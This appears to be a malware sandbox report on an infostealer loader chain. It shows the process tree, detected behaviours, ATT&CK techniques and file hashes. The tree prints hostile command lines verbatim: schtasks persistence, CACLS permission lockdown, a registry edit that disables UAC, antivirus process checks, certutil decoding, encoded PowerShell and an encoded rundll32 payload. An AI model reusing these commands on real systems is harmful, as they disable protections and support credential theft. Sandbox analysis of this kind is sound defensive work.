- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mian.exe  (level 3)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mian.exe
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe  (level 4)  cmdline: "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe  (level 5)  cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe  (level 5)  cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe  (level 6)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 6)  cmdline: CACLS "mnolyk.exe" /P "Admin:N"
-
C:\Windows\SysWOW64\cacls.exe  (level 6)  cmdline: CACLS "mnolyk.exe" /P "Admin:R" /E
-
C:\Windows\SysWOW64\cmd.exe  (level 6)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 6)  cmdline: CACLS "..\5eb6b96734" /P "Admin:N"
-
C:\Windows\SysWOW64\cacls.exe  (level 6)  cmdline: CACLS "..\5eb6b96734" /P "Admin:R" /E
-
C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe  (level 5)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe"
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe  (level 5)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe  (level 5)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe  (level 6)  cmdline: "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe  (level 7)  cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe  (level 7)  cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.exe  (level 8)  cmdline: CACLS "nbveek.exe" /P "Admin:N"
-
C:\Windows\SysWOW64\cmd.exe  (level 8)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 8)  cmdline: CACLS "nbveek.exe" /P "Admin:R" /E
-
C:\Windows\SysWOW64\cacls.exe  (level 8)  cmdline: CACLS "..\9e0894bcc4" /P "Admin:N"
-
C:\Windows\SysWOW64\cmd.exe  (level 8)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 8)  cmdline: CACLS "..\9e0894bcc4" /P "Admin:R" /E
-
C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000023001\meta2.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000023001\meta2.exe"
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  (level 8)  cmdline: "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe  (level 9)  cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe  (level 9)  cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
-
C:\Windows\SysWOW64\cmd.exe  (level 10)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 10)  cmdline: CACLS "nbveek.exe" /P "Admin:N"
-
C:\Windows\SysWOW64\cacls.exe  (level 10)  cmdline: CACLS "nbveek.exe" /P "Admin:R" /E
-
C:\Windows\SysWOW64\cmd.exe  (level 10)  cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
C:\Windows\SysWOW64\cacls.exe  (level 10)  cmdline: CACLS "..\16de06bfb4" /P "Admin:N"
-
C:\Windows\SysWOW64\cacls.exe  (level 10)  cmdline: CACLS "..\16de06bfb4" /P "Admin:R" /E
-
C:\Windows\SysWOW64\rundll32.exe  (level 9)  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe  (level 10)  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exe  (level 11)  cmdline: C:\Windows\system32\WerFault.exe -u -p 3368 -s 680
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000043001\redline2.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000043001\redline2.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe  (level 8)  cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
-
C:\Windows\SysWOW64\WerFault.exe  (level 8)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 720
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe  (level 8)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4528 -s 948
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe  (level 8)  cmdline: "C:\Users\Admin\AppData\Roaming\nsis_unse57c043.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8E37AEwhAFUAaABCvhcASwBDAHhDADDvADkASi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpDkBi||EQYsQRTPSSP8D04oChMB0HX9BwcoND77A+gDvAUQD0L8RdexB|4H6qvwNfHQO|4PBAUmDwARB|zvJc2nrxovB|w+3DE5FiyyLf0wD63RYM+2qEN90UUGLFMEA0zP|yYoCTIvC6w|bwcnIEQPI5RABQfuKANUQ7TPAM|bPQTsMtuAQpgCDxv8Bg|gIcu7rCv9Ii8tB|9VJie8E94PF5BDEBDvvbxhyr2YBQV9B|15BXUFcX15dfVszF0iB7GABZAD|i+noZv7||0jfhcAPhJh1IEyN+q8BiysQyDP|6Jv+fSCNXwRMjUVG|zPSi8v|VCRofoAgTIvgD4RrdSC9RagQM8CL05EgSK+JfCQgpiBwgCBIn4vwD4RLdSCmIFD|SI1WCESNR0DvSI2MJIURSIvYd+h8|X4gjVZI3iC1EOIhzPPw6GfvIESfiwaNVwhBIKYgWF7KIYmEJICHEt7z8HuLDtogWImMJHERbAcwkSDoMe8gi5wtMv9Mi106SIP7bP1IiiAwTIlkJDh3TIukGjJMiVyEAbeEJNyHEYaSjRGN3UdLMIwk8PPwSYtv1Ojp|AUwipx4MvdIjYR4MkGA8yG|jU9sRDAYpAKDv+kBdfOBvHgyIf9SZXh1TYuEJN30IjGUJPg1AcJI|zvYcjiD+mx23zNEjUlA+gCUQdO4AJgApiBAyiL4dPMZRLYwwDFJjVQk|WyRIEmD6Gzoa+6CMEiLzqYgeEiFf|90EotVQkyOMP4bMUiNTCRA|9cHSIHEdCFhJC0ILQE=
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exe  (level 9)  cmdline: C:\Windows\system32\WerFault.exe -u -p 3852 -s 648
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe  (level 8)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 712
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe  (level 8)  cmdline: C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe /TH_ID=_3928 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000090001\redline1.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\CmD.exe  (level 9)  cmdline: C:\Windows\system32\CmD.exe /c cmd < 80
-
C:\Windows\SysWOW64\cmd.exe  (level 10)  cmdline: cmd
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (level 11)  cmdline: powershell get-process avastui
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (level 11)  cmdline: powershell get-process avgui
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\certutil.exe  (level 11)  cmdline: certutil -decode 5 5fbHlM
-
C:\Windows\SysWOW64\findstr.exe  (level 11)  cmdline: findstr /V /R "^BYLhzgJfvHMGFGbkIYAzlXUMcmgLOfzNNBjXWVOwahotMobsaoVUFcQEtYSUZYBuhYTtzmgNlmwWOQZjwXaFxnosKI$" 5fbHlM
-
C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\15157\Russian.exe.pif  (level 11)  cmdline: 15157\\Russian.exe.pif 15157\\N
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exe  (level 12)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1884
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe  (level 12)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 1860
- Program crash
-
C:\Windows\SysWOW64\PING.EXE  (level 11)  cmdline: ping localhost -n 18
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe  (level 8)  cmdline: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000126001\meta4.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000126001\meta4.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  (level 8)  cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe  (level 8)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 556
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000129001\redline4.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000129001\redline4.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe  (level 8)  cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe  (level 8)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 556
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe  (level 8)  cmdline: C:\Users\Admin\AppData\Local\Temp\1000135001\redline3.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000136001\Aurora.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000136001\Aurora.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\SysWOW64\rundll32.exe  (level 8)  cmdline: "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
- Blocklisted process makes network request
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\1000137001\NOTallowedtocrypt.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000137001\NOTallowedtocrypt.exe"
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe  (level 8)  cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\reg.exe  (level 9)  cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- UAC bypass
- Modifies registry key
-
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe  (level 8)  cmdline: "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe  (level 9)  cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\reg.exe  (level 10)  cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- UAC bypass
- Modifies registry key
-
\??\c:\program files (x86)\internet explorer\iexplore.exe  (level 9)  cmdline: "c:\program files (x86)\internet explorer\iexplore.exe"
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe  (level 10)  cmdline: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
-
C:\Windows\SysWOW64\reg.exe  (level 11)  cmdline: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\svchost.exe  (level 10)  cmdline: svchost.exe
-
C:\Users\Admin\AppData\Local\Temp\dwn.exe  (level 10)  cmdline: "C:\Users\Admin\AppData\Local\Temp\dwn.exe"
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
-
C:\Users\Admin\AppData\Roaming\CBqrmoFax.exe  (level 11)  cmdline: "C:\Users\Admin\AppData\Roaming\CBqrmoFax.exe"
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 12)  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAzAA==
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 12)  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQwBCAHEAcgBtAG8ARgBhAHgALgBlAHgAZQAiACAALQBGAG8AcgBjAGUA
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe  (level 7)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe  (level 8)  cmdline: "C:\Users\Admin\AppData\Local\Temp\1000142001\meta5.exe"
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe  (level 7)  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe  (level 8)  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exe  (level 9)  cmdline: C:\Windows\system32\WerFault.exe -u -p 3732 -s 684
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe  (level 7)  cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ani.exe  (level 3)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ani.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe  (level 2)  cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 448
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3036 -ip 3036
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  (level 1)  cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe  (level 1)  cmdline: C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 396 -ip 396
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2648 -ip 2648
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4528 -ip 4528
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4528 -ip 4528
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4268 -ip 4268
-
C:\Windows\system32\OpenWith.exe  (level 1)  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exe  (level 1)  cmdline: C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\system32\AUDIODG.EXE  (level 1)  cmdline: C:\Windows\system32\AUDIODG.EXE 0x52c 0x524
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exe  (level 1)  cmdline: C:\Windows\system32\WerFault.exe -pss -s 412 -p 3852 -ip 3852
-
C:\Windows\system32\WerFault.exe  (level 1)  cmdline: C:\Windows\system32\WerFault.exe -pss -s 516 -p 3732 -ip 3732
-
C:\Windows\system32\WerFault.exe  (level 1)  cmdline: C:\Windows\system32\WerFault.exe -pss -s 496 -p 3368 -ip 3368
-
C:\Windows\SysWOW64\explorer.exe  (level 1)  cmdline: C:\Windows\SysWOW64\explorer.exe
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exe  (level 1)  cmdline: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe  (level 1)  cmdline: C:\Windows\SysWOW64\explorer.exe
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exe  (level 1)  cmdline: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe  (level 1)  cmdline: C:\Windows\SysWOW64\explorer.exe
- Suspicious behavior: MapViewOfSection
-
C:\Windows\explorer.exe  (level 1)  cmdline: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe  (level 1)  cmdline: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\system32\svchost.exe  (level 1)  cmdline: C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
- Checks processor information in registry
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe  (level 1)  cmdline: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe  (level 1)  cmdline: C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
- Executes dropped EXE
-
C:\Windows\explorer.exe  (level 1)  cmdline: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe  (level 1)  cmdline: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1356 -ip 1356
-
C:\Windows\SysWOW64\WerFault.exe  (level 1)  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1356 -ip 1356
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
Defense Evasion
- Modify Registry: 5
- Disabling Security Tools: 3
- Bypass User Account Control: 1
- Scripting: 1
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\redline3.exe.log
Filesize: 1KB
MD5: a3c82409506a33dec1856104ca55cbfd
SHA1: 2e2ba4e4227590f8821002831c5410f7f45fe812
SHA256: 780a0d4410f5f9798cb573bcd774561d1439987a39b1368d3c890226928cd203
SHA512: 9621cfd3dab86d964a2bea6b3788fc19a895307962dcc41428741b8a86291f114df722e9017f755f63d53d09b5111e68f05aa505d9c9deae6c4378a87cdfa69f
-
C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe
Filesize: 175KB
MD5: 10fc0e201418375882eeef47dba6b6d8
SHA1: bbdc696eb27fb2367e251db9b0fae64a0a58b0d0
SHA256: b6dcda3b84e6561d582db25fdbdbcd6ddb350579899817122d08dfdb6c8fd2a3
SHA512: 746b1f7c7f6e841bdbe308c34ed20e2cf48a757a70f97e6f37903f3ec0aa0c8d944cc75648109a6594839df0e3858ba84177d2fa3cc6398f39656c6421df2ad5
-
C:\Users\Admin\AppData\Local\Temp\1000003001\meta3.exe
Filesize: 175KB
MD5: 10fc0e201418375882eeef47dba6b6d8
SHA1: bbdc696eb27fb2367e251db9b0fae64a0a58b0d0
SHA256: b6dcda3b84e6561d582db25fdbdbcd6ddb350579899817122d08dfdb6c8fd2a3
SHA512: 746b1f7c7f6e841bdbe308c34ed20e2cf48a757a70f97e6f37903f3ec0aa0c8d944cc75648109a6594839df0e3858ba84177d2fa3cc6398f39656c6421df2ad5
-
C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe
Filesize: 11KB
MD5: 7e93bacbbc33e6652e147e7fe07572a0
SHA1: 421a7167da01c8da4dc4d5234ca3dd84e319e762
SHA256: 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38
SHA512: 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91
-
C:\Users\Admin\AppData\Local\Temp\1000014001\nika.exe
Filesize: 11KB
MD5: 7e93bacbbc33e6652e147e7fe07572a0
SHA1: 421a7167da01c8da4dc4d5234ca3dd84e319e762
SHA256: 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38
SHA512: 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91
-
C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe
Filesize: 175KB
MD5: ed98d89ee3ff45670756e8dda4345b62
SHA1: d8cef7e32b2261447f3e53617a1d53647e4dae6d
SHA256: 18b11eae56eaa7b76512c5e88aae06fda4faebbd477c01e837f5ca1b3ffd1985
SHA512: 7d89e36c3b79f4862da2f4a39c29b96c125b72a94e2ac2e01a1327f2930d04bfaa853abbab789dfd2b8e9de8105c943731da838ea9efb2d9133292304297058a
-
C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe
Filesize: 175KB
MD5: ed98d89ee3ff45670756e8dda4345b62
SHA1: d8cef7e32b2261447f3e53617a1d53647e4dae6d
SHA256: 18b11eae56eaa7b76512c5e88aae06fda4faebbd477c01e837f5ca1b3ffd1985
SHA512: 7d89e36c3b79f4862da2f4a39c29b96c125b72a94e2ac2e01a1327f2930d04bfaa853abbab789dfd2b8e9de8105c943731da838ea9efb2d9133292304297058a
-
C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe
Filesize: 235KB
MD5: ebd584e9c1a400cd5d4bafa0e7936468
SHA1: d263c62902326425ed17855d49d35003abcd797b
SHA256: ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
SHA512: e94b7bca0258e2f2fd374898c87196587311af4aa20f1197ef8d0fddcdc098fdd0096152d27b49cbe21a3527624339fe0c806c7aa4ea6c80b76764ee2245a010
-
C:\Users\Admin\AppData\Local\Temp\1000018001\lebro.exe
Filesize: 235KB
MD5: ebd584e9c1a400cd5d4bafa0e7936468
SHA1: d263c62902326425ed17855d49d35003abcd797b
SHA256: ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b
